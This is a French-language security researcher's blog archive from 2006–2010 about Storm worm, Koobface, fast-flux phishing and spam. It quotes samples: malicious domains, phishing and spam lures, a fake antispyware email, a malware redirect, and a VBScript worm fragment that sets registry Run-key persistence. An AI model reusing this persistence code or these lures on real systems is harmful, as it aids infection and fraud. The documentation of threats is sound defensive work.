Table of Contents

Moi aussi j'ai un blog

Février 2010

15 février 2010

Challenge 2 of the Forensic Challenge 2010

Janvier 2010

06 janvier 2010

Message de circonstance, bis

05 janvier 2010

Message de circonstance

bb-ny2010.jpg

Octobre 2009

07 Octobre 2009

Erreur des impôts en votre faveur...

Septembre 2009

02 Septembre 2009

Master, what are your orders ?

#BLACKLABEL
FBTARGETPERPOST|20
TITLE_M|LOL Video
TEXT_M|WOW
LINK_M|hxxp://filipinaprincess.com/c00lm0vie/?youtube.com
TEXT_W|WOW Video hxxp://neverend.org/extrlmesh0w/?youtube.com
TEXT_S|My last video ;) hxxp://martinhorngren.com/y0urdwd/?youtube.com
#CACHE
MD5|e0678b0e791a35246563e45321d4c9c4

Géoloc. malicieuse

GET / HTTP/1.1
Host: www.google.com

(...)

HTTP/1.1 302 Found
Location: http://www.google.de/

(...)

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.de/">here</A>.
</BODY></HTML>

1er Septembre 2009

Koobface

tom.jpg

Juin 2009

12 juin

Epic...

Janvier 2009

23 janvier

Les débuts d'années passent et se ressemblent aussi...

Décembre 2008

26 décembre

Les fins d'années passent et se ressemblent...

bestchristmascard.com
blackchristmascard.com
cheapdecember.com
christmaslightsnow.com
decemberchristmas.com
directchristmasgift.com
freechristmassite.com
freechristmasworld.com
freedecember.com
funnychristmasguide.com
holidayxmas.com
itsfatherchristmas.com
justchristmasgift.com
livechristmascard.com
livechristmasgift.com
superchristmasday.com
superchristmaslights.com
whitewhitechristmas.com
yourchristmaslights.com
yourdecember.com

Novembre 2008

04 novembre

BioHacking: BioHazard ?

02 novembre

Happy Wormday to you, Internet !

Aout 2008

29 aout

Sexual Engineering, part 2

13 aout

Alertes CNN

var begin_popup_url = 'hxxp://asvoo.org/antivir/';

08 aout

Storm* dans une forme olympique

05 aout

Devinette.js

<SCRIPT language="Javascript">
var url = "www.video.news.com.cnn";
var load_url = url.substring(0,url.length - 1);
document.write(load_url);
</SCRIPT>

Alerte au faux CNN

Juin 2008

20 Juin

Sexual Engineering Revisited

17 Juin

What's next : Storm Bulletproof Storage

* Ce qui ne veut pas dire que je milite pour un laisser-faire en la matière !

(sh)it happens again

It has bgeun.

Angtrsom Mi_crosyst'_ems
T"rade"d a-s: agms.ob
Our take: Day Tarreds der am
Now:'' 40 cents
Voulme: -331,485

Investors saw the ne_ws- and, tadrin"g is up to 331,485 to.day.

Change is i n itiaetd, filling the untpaepd needs  of "sofwt-are a_nd,
green comupting  Angs- trom is t akni'g of"f.

Fi_n"al ,price reduciton leaves you in a great position, set. your buy
post' your buy now.' 

16 Juin

22 ans avant Debian...

13 juin

What's next : Storm in the middle ?

  1. Utilisation d'un resolver DNS Storm. Ce resolver répond correctement à la majeure partie des requêtes. Je tape “www.google.com”, je tombe bien chez Google. Par contre, quand je rentre “www.mabanque.fr”, mon resolver Storm me redirige vers un proxy Storm.
  2. Préalabment, Zlob ou un de ces congénères aura pris soin d'installer sur mon poste le certificat SSL d'une Autorité de Certification (AC) malicieuse.
  3. Le proxy Storm fait son travail de proxy et, en utilisant un certificat signé par l'AC malicieuse, chiffre/déchiffre à la volée les données échangées entre moi et mabanque.fr, en toute transparence. Ni vu ni connu je t'embrouille.

Rapport IronPort

12 juin

Sexual Engineering

Détournement des flux DNS

11 juin

Storm : fin de la récré ?

How I learned Reverse Engineering with Storm - Pierre-Marc Bureau

The Storm Worm is a family of malware that has been present on the Internet for more than eighteen months. It has attracted quite a bit of media attention due to its huge spam campaigns and the size of its botnet. Its authors have invested much time and effort to build a strong and reliable botnet.

<snipped>

In the second part of my presentation, I explain key features of the Storm's peer-to-peer network and how using static analysis found important information about the network: We were able to recover the key used in the network encoding routine and the hash generation routine used by the botnet controller to send commands to its botnet. With this information, we were able to create a tool to connect to Storm's network and learn more about its authors and their operations.

  1. Depuis le réseau P2P (messages OverNet Search/SearchResult). Hypothèse la plus probable ou tout du moins la plus couramment admise ;
  2. A l'aide d'une routine intégrée au code du bot et qui lui permet de calculer le Hash du contrôleur en fonction de l'heure système. Ce Hash serait ensuite passé en argument des messages OverNet Search.

10 juin

Storm Phishing

09 juin

07 juin

Back from Rennes

03 juin

Storm Business as Usual

02 juin

Vade Retro, Wget !

 wget http://chraieno.com/
--09:40:52--  http://chraieno.com/
           => `index.html'
Résolution de chraieno.com... 219.157.92.178
Connexion vers chraieno.com|219.157.92.178|:80... connecté.
requête HTTP transmise, en attente de la réponse... 401 Unauthorized
 wget --user-agent=MickeyMouse http://chraieno.com/
--09:41:11--  http://chraieno.com/
           => `index.html'
Résolution de chraieno.com... 219.157.92.178
Connexion vers chraieno.com|219.157.92.178|:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK

YAPOZP (Yet Another Piece Of Ze Puzzle)

Mai 2008

20 mai

YARR? (Yet Another Rogue Registrar)

Registrant:
    PrivacyProtect.org
    Domain Admin        (contact@privacyprotect.org)
    P.O. Box 97
    All Postal Mails Rejected, visit Privacyprotect.org
    Moergestel
    null,5066 ZH
    NL
    Tel. +45.36946676

13 mai

YAPFFC (Yet Another Phishing + Fast-Flux Case)

$ dig paypal.client-records.com +trace

; <<>> DiG 9.4.2 <<>> paypal.client-records.com +trace
;; global options:  printcmd
.			26092	IN	NS	L.ROOT-SERVERS.NET.
.			26092	IN	NS	M.ROOT-SERVERS.NET.
.			26092	IN	NS	F.ROOT-SERVERS.NET.
.			26092	IN	NS	J.ROOT-SERVERS.NET.
.			26092	IN	NS	I.ROOT-SERVERS.NET.
.			26092	IN	NS	H.ROOT-SERVERS.NET.
.			26092	IN	NS	B.ROOT-SERVERS.NET.
.			26092	IN	NS	E.ROOT-SERVERS.NET.
.			26092	IN	NS	G.ROOT-SERVERS.NET.
.			26092	IN	NS	K.ROOT-SERVERS.NET.
.			26092	IN	NS	C.ROOT-SERVERS.NET.
.			26092	IN	NS	A.ROOT-SERVERS.NET.
.			26092	IN	NS	D.ROOT-SERVERS.NET.
;; Received 228 bytes from 192.168.1.1#53(192.168.1.1) in 32 ms

com.			172800	IN	NS	E.GTLD-SERVERS.NET.
com.			172800	IN	NS	F.GTLD-SERVERS.NET.
com.			172800	IN	NS	G.GTLD-SERVERS.NET.
com.			172800	IN	NS	H.GTLD-SERVERS.NET.
com.			172800	IN	NS	I.GTLD-SERVERS.NET.
com.			172800	IN	NS	J.GTLD-SERVERS.NET.
com.			172800	IN	NS	K.GTLD-SERVERS.NET.
com.			172800	IN	NS	L.GTLD-SERVERS.NET.
com.			172800	IN	NS	M.GTLD-SERVERS.NET.
com.			172800	IN	NS	A.GTLD-SERVERS.NET.
com.			172800	IN	NS	B.GTLD-SERVERS.NET.
com.			172800	IN	NS	C.GTLD-SERVERS.NET.
com.			172800	IN	NS	D.GTLD-SERVERS.NET.
;; Received 499 bytes from 192.36.148.17#53(I.ROOT-SERVERS.NET) in 100 ms

client-records.com.	172800	IN	NS	ns1.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns2.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns3.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns4.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns5.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns6.b546ec5a89.com.
;; Received 258 bytes from 192.12.94.30#53(E.GTLD-SERVERS.NET) in 195 ms

paypal.client-records.com. 180	IN	A	76.190.174.234
paypal.client-records.com. 180	IN	A	76.118.218.165
paypal.client-records.com. 180	IN	A	12.169.239.27
paypal.client-records.com. 180	IN	A	125.135.80.187
paypal.client-records.com. 180	IN	A	63.207.249.184
paypal.client-records.com. 180	IN	A	70.252.135.184
paypal.client-records.com. 180	IN	A	67.235.163.173
paypal.client-records.com. 180	IN	A	68.52.15.101
paypal.client-records.com. 180	IN	A	24.8.1.214
paypal.client-records.com. 180	IN	A	12.202.157.32
;; Received 203 bytes from 24.158.37.92#53(ns6.b546ec5a89.com) in 231 ms
client-records.com.	172800	IN	NS	ns1.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns2.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns3.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns4.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns5.b546ec5a89.com.
client-records.com.	172800	IN	NS	ns6.b546ec5a89.com.
;; Received 258 bytes from 192.55.83.30#53(M.GTLD-SERVERS.NET) in 355 ms

client-records.com.	180	IN	SOA	ns.client-records.com.
$ dig ns.client-records.com

; <<>> DiG 9.4.2 <<>> ns.client-records.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56458
;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;ns.client-records.com.		IN	A

;; ANSWER SECTION:
ns.client-records.com.	180	IN	A	70.230.200.104
ns.client-records.com.	180	IN	A	75.133.151.59
ns.client-records.com.	180	IN	A	69.206.155.102
ns.client-records.com.	180	IN	A	12.169.239.27
ns.client-records.com.	180	IN	A	75.58.35.177
ns.client-records.com.	180	IN	A	24.195.242.44
ns.client-records.com.	180	IN	A	76.97.26.255
ns.client-records.com.	180	IN	A	98.226.10.84
ns.client-records.com.	180	IN	A	76.244.109.194
ns.client-records.com.	180	IN	A	69.235.134.216

;; Query time: 728 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Wed May 14 16:15:36 2008
$ whois client-records.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: CLIENT-RECORDS.COM
   Registrar: XIN NET TECHNOLOGY CORPORATION
   Whois Server: whois.paycenter.com.cn
   Referral URL: http://www.xinnet.com
   Name Server: NS1.B546EC5A89.COM
   Name Server: NS2.B546EC5A89.COM
   Name Server: NS3.B546EC5A89.COM
   Name Server: NS4.B546EC5A89.COM
   Name Server: NS5.B546EC5A89.COM
   Name Server: NS6.B546EC5A89.COM
   Status: ok
   Updated Date: 13-may-2008
   Creation Date: 12-may-2008
   Expiration Date: 12-may-2009

>>> Last update of whois database: Wed, 14 May 2008 14:15:47 UTC <<<

Domain Name:client-records.com

Registrant: 
li yuehua
	pudonglu888
	200135
	
Administrative Contact: 
liyuehua
	li yuehua
	pudonglu888
	SH Shanghai 200135
	CN
	tel:  215 0692838 
	fax:  215 0692838 
	david780213@yahoo.com.cn
	
Technical Contact: 
liyuehua
	li yuehua
	pudonglu888
	SH Shanghai 200135
	CN
	tel:   0692838 
	fax:   0692838 
	david780213@yahoo.com.cn
	
Billing Contact: 
liyuehua
	li yuehua
	pudonglu888
	SH Shanghai 200135
	CN
	tel:   0692838 
	fax:   0692838 
	david780213@yahoo.com.cn
	
 Registration Date: 2008-05-12
       Update Date: 2008-05-14
   Expiration Date: 2009-05-12
	
    Primary DNS:  ns1.b546ec5a89.com		69.209.125.6
  Secondary DNS:  ns2.b546ec5a89.com		74.73.233.121
 Domain Name: B546EC5A89.COM
   Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
   Whois Server: whois.dns.com.cn
   Referral URL: http://www.dns.com.cn
   Name Server: NS1.B546EC5A89.COM
   Name Server: NS2.B546EC5A89.COM
   Name Server: NS3.B546EC5A89.COM
   Name Server: NS4.B546EC5A89.COM
   Status: clientHold
   Status: clientTransferProhibited
   Updated Date: 08-apr-2008
   Creation Date: 14-aug-2007
   Expiration Date: 14-aug-2008

>>> Last update of whois database: Wed, 14 May 2008 10:21:08 EDT <<<


Domain Name.......... b546ec5a89.com
  Creation Date........ 2007-08-14 23:15:25
  Registration Date.... 2007-08-14 23:15:25
  Expiry Date.......... 2008-08-14 23:15:25
  Organisation Name.... xiaowen
  Organisation Address. No.12 chang an road
  Organisation Address.
  Organisation Address. Beijing
  Organisation Address. 100001
  Organisation Address. BJ
  Organisation Address. CN

Admin Name........... ah wen
  Admin Address........ No.12 chang an road
  Admin Address........
  Admin Address........ Beijing
  Admin Address........ 100001
  Admin Address........ BJ
  Admin Address........ CN
  Admin Email.......... 490@23.com
  Admin Phone.......... +86.1034546677
  Admin Fax............ +86.1067688466

Tech Name............ ah wen
  Tech Address......... No.12 chang an road
  Tech Address.........
  Tech Address......... Beijing
  Tech Address......... 100001
  Tech Address......... BJ
  Tech Address......... CN
  Tech Email........... 490@23.com
  Tech Phone........... +86.1034546677
  Tech Fax............. +86.1067688466

Bill Name............ ah wen
  Bill Address......... No.12 chang an road
  Bill Address.........
  Bill Address......... Beijing     
  Bill Address......... 100001    
  Bill Address......... BJ     
  Bill Address......... CN   
  Bill Email........... 490@23.com
  Bill Phone........... +86.1034546677
  Bill Fax............. +86.1067688466
  Name Server.......... ns2.b546ec5a89.com
  Name Server.......... ns1.b546ec5a89.com
  Name Server.......... ns4.b546ec5a89.com
  Name Server.......... ns3.b546ec5a89.com
$ ./dig-it.sh b546ec5a89.ns 
ns1.b546ec5a89.com.	170935	IN	A	69.209.125.6
ns2.b546ec5a89.com.	171755	IN	A	74.73.233.121
ns3.b546ec5a89.com.	171769	IN	A	68.45.176.12
ns4.b546ec5a89.com.	171773	IN	A	71.195.136.112
ns5.b546ec5a89.com.	172123	IN	A	71.91.56.97
ns6.b546ec5a89.com.	172123	IN	A	24.166.101.42
ns7.b546ec5a89.com.	172123	IN	A	69.207.38.100

Avril 2008

28 avril

SSTIC 2008

Phishing + Fast-Flux

yom@yom-laptop:~$ dig paypal.user-updates.com

; <<>> DiG 9.4.1-P1 <<>> paypal.user-updates.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49094
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;paypal.user-updates.com.       IN      A

;; ANSWER SECTION:
paypal.user-updates.com. 1757   IN      A       92.80.81.140
paypal.user-updates.com. 1757   IN      A       121.142.226.129
paypal.user-updates.com. 1757   IN      A       121.155.131.84
paypal.user-updates.com. 1757   IN      A       121.160.93.188
paypal.user-updates.com. 1757   IN      A       71.192.111.168

;; Query time: 39 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Mon Apr 28 11:06:25 2008
;; MSG SIZE  rcvd: 121

yom@yom-laptop:~$ dig paypal.user-updates.com

; <<>> DiG 9.4.1-P1 <<>> paypal.user-updates.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16804
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;paypal.user-updates.com.       IN      A

;; ANSWER SECTION:
paypal.user-updates.com. 1734   IN      A       71.192.111.168
paypal.user-updates.com. 1734   IN      A       92.80.81.140
paypal.user-updates.com. 1734   IN      A       121.142.226.129
paypal.user-updates.com. 1734   IN      A       121.155.131.84
paypal.user-updates.com. 1734   IN      A       121.160.93.188

;; Query time: 41 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Mon Apr 28 11:06:47 2008
;; MSG SIZE  rcvd: 121
71.192.111.168	:
*.bibm2.com		                                    A		
*.bpna.webcashmanager.wcmfd.wcmpw.customerlogin.jhg4e.com   A		
*.co.uk.form-4.userid-en.com		                    A		
*.customerlogin.jhg4e.com		                    A		
*.form-4.userid-en.com		                            A		
*.jhg4e.com		                                    A		
*.lloydstsb.co.uk.form-4.userid-en.com		            A		
*.uk.form-4.userid-en.com		                    A		
*.user-updates.com		                            A		
*.userid-en.com		                                    A		
*.wcmfd.wcmpw.customerlogin.jhg4e.com		            A		
*.wcmpw.customerlogin.jhg4e.com		                    A		
*.webcashmanager.wcmfd.wcmpw.customerlogin.jhg4e.com	    A		
bibm2.com		                                    A		
bpna.webcashmanager.wcmfd.wcmpw.customerlogin.jhg4e.com	    A		
c-71-192-111-168.hsd1.ma.comcast.net	                    PTR	A		
co.uk.form-4.userid-en.com		                    A		
customerlogin.jhg4e.com		                            A		
form-4.userid-en.com		                            A		
huwe1.com		                                    A		
jhg4e.com		                                    A		
lloydstsb.co.uk.form-4.userid-en.com		            A		
membin-lang.us		                                    A		
online.lloydstsb.co.uk.form-4.userid-en.com		    A		
paypal.user-updates.com		                            A		
setuserlogin-en.com	 	                            A		
stgeeorge.com		                                    A		
uk.form-4.userid-en.com		                            A		
user-updates.com		                            A		
userid-en.com		                                    A		
wcmfd.wcmpw.customerlogin.jhg4e.com		            A		
wcmpw.customerlogin.jhg4e.com		                    A		
webcashmanager.wcmfd.wcmpw.customerlogin.jhg4e.com	    A		
www.bibm2.com		                                    A		
www.bpna.webcashmanager.wcmfd.wcmpw.customerlogin.jhg4e.com A		
www.userid-en.com		                            A	

2 avril

RFCs & Storm Worm

5241 Naming Rights in IETF Protocols. A. Falk, S. Bradner. April 1
     2008. (Status: INFORMATIONAL)

5242 A Generalized Unified Character Code: Western European and CJK
     Sections. J. Klensin, H. Alvestrand. April 1 2008.
     bytes) (Status: INFORMATIONAL)

Février 2008

St Valentin : "Dîtes-le avec des vers"

<meta http-equiv="refresh" content="5;url=valentine.exe">.

Décembre 2007

27 décembre - горячей Рождества ! Episode 2

uhavepostcard.com
happycards2008.com
newyearcards2008.com

24 décembre - горячей Рождества !

Subject: The Perfect Christmas

do you have a min?

Open this when no one is around, I think you will get a kick out of it
but it is for your eyes only, ok? This wont take long, but its worth it.
http://merrychristmasxxxxx.com/ 

Novembre 2007

04 novembre

set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Octobre 2007

19 octobre

Septembre 2007

O4 septembre 2007

From: "TrendMicro Inc." <info@chafe.org>
To: <gloyeshome@free.fr>
Subject: Your Money on Bank Account has Been Stolen
Date: Tue, 4 Sep 2007 19:47:54 +0400

Greetings from TrendMicro Inc.
http://trendmicroinc.cn
 
Please carefully review message below.
 
Spyware collects your protected storage info plus URLs, chat activity, 
website usernames and passwords. The real problem with spyware that it 
collects this information and posts it back to a public website that 
anyone could go to and read all of your personal information. 
Some examples of this include all the credit card info entered on 
HTML forms while purchasing something online. It did not matter that 
the webpage was using HTTPS. More sophisticated versions of spyware 
can automatically transfer funds from Paypal and E-gold to fraudsters accounts.
 
TrendMicro AntiSpyware automatically monitor, respond, and protect 
against a broad range of threats from the Internet 24/7, 
so you don’t have to.
 
Download Free Trial Of Antispyware Now!
http://trendmicroinc.cn
 
Benefits:
- Helps to combat phishing and URL usurpation
- Guards against spyware attempts to send stolen information 
  to hackers and cybercriminals
- Complements traditional content inspection for optimum threat protection
- Does not impact PC performance or alter Web surfing experience

<snip>

Microsoft	1.2803	 2007.09.04	TrojanDropper:Win32/Malf.gen
Panda	        9.0.0.4	 2007.09.04	Suspicious file
$ whois trendmicroinc.cn
Domain Name: trendmicroinc.cn
ROID: 20070822s10001s58602326-cn
Domain Status: ok
Registrant Organization: Int incd
Registrant Name: Trully Sam
Administrative Email: ssffrlssey@safe-mail.net
Sponsoring Registrar: 厦门华商盛世网络有限公司
Name Server:ns1.freemydns.org
Name Server:ns2.freemydns.org
Registration Date: 2007-08-22 00:31
Expiration Date: 2008-08-22 00:31

Aout 2007

27 aout 2007

20 aout 2007

Juin 2007

26 juin 2007

04 juin 2007

* Le SSTIC est-il toujours le SSTIC

Avril 2007

Happy Birthday

sinclair_zx81.jpg

23 avril - I've got mail from Juliana

20 avril - Le juste prix

1 Si c'est un exploit de type 0-Day, pas si c'est un mot de passe root de type “toto”…

Janvier 2007

23 janvier - Ca n'arrive - peut-être pas - qu'aux autres...

Décembre 2006

13 décembre - This is the end...

Octobre 2006

19 octobre - 21 octobre

Septembre 2006

1er septembre

Article 34

Le responsable du traitement est tenu de prendre toutes précautions utiles, au regard de la nature des données et des risques présentés par le traitement, pour préserver la sécurité des données et, notamment, empêcher qu’elles soient déformées, endommagées, ou que des tiers non autorisés y aient accès.

Août 2006

29 août 2006

25 août 2006

17 août 2006

Juillet 2006

07 juillet 2006

05 juillet 2006

Juin 2006

20 juin 2006

L'explosion du Boeing 747 d'Air India le 23 juin 1985 au dessus de l'océan Atlantique 
était l'oeuvre :
  
A. D'extrémistes musulmans de sexe masculin agés entre 17 et 40 ans
B. De Bill O'Reilly
C. De une chorale mormonne
D. D'extrémistes Sikhs en réponse à la destruction du Temple d'Or d'Amritsar par l'armée indienne.
  
En 1986, qui tenta d'introduire 1 kg d'explosifs dans un appareil d'El Al 
reliant Londres à Tel Aviv ?
  
A. Des extrémistes musulmans de sexe masculin agés entre 17 et 40 ans
B. Michael Smerconish
C. Bob Mould
D. Une Irlandaise enceinte appelée Anne Murphy
  
En 1962, la première destruction par explosif d'un appareil commercial,
un Boeing 707 de la Continental Airlines, fut l'oeuvre :
  
A. D'extrémistes musulmans de sexe masculin agés entre 17 et 40 ans
B. D'Ann Coulter
C. D'Henry Rollins
D. De Thomas Doty, 34 ans, dans le cadre d'une escroquerie à l'assurance
  
En 1994, qui a faillit détourner un DC-10 dans le but de le faire s'écraser 
sur le siège social de la société Federal Express ?
  
A. Des extrémistes musulmans de sexe masculin agés entre 17 et 40 ans
B. Michelle Malkin
C. Charlie Rose
D. Auburn Calloway, employé de la FedEx
  
En 1974, qui détourna un DC-9 de la Delta Air Lines avec l'intention de le faire s'écraser
sur la Maison Blanche après avoir abattu ses deux pilotes ?
  
A. Des extrémistes musulmans de sexe masculin agés entre 17 et 40 ans
B. Joe Scarborough
C. Spalding Gray
D. Samuel Byck, un vendeur de pneumatiques au chomage

13 juin 2006

05 juin 2006 - About SSTIC édition 2006

03 juin 2006 - Retour de SSTIC

Mai 2006

23 mai 2006

18 mai 2006 - Précision sur "L'infection, c'est simple comme un coup de souris..."

17 mai 2006 - L'infection, c'est simple comme un coup de souris...

10 mai 2006 - Gaston y'a l' e-téléfon qui son...

09 mai 2006 - "Nouvelle" technique d'hameçonnage

Mars 2006

09 mars 2006 - "Nouvelle" vulnérabilité BlackBerry

08 mars 2006 - Comment faire foirer la cérémonie des Oscar

03 mars 2006 - Journées Sécurité Microsoft / CNIT La Défense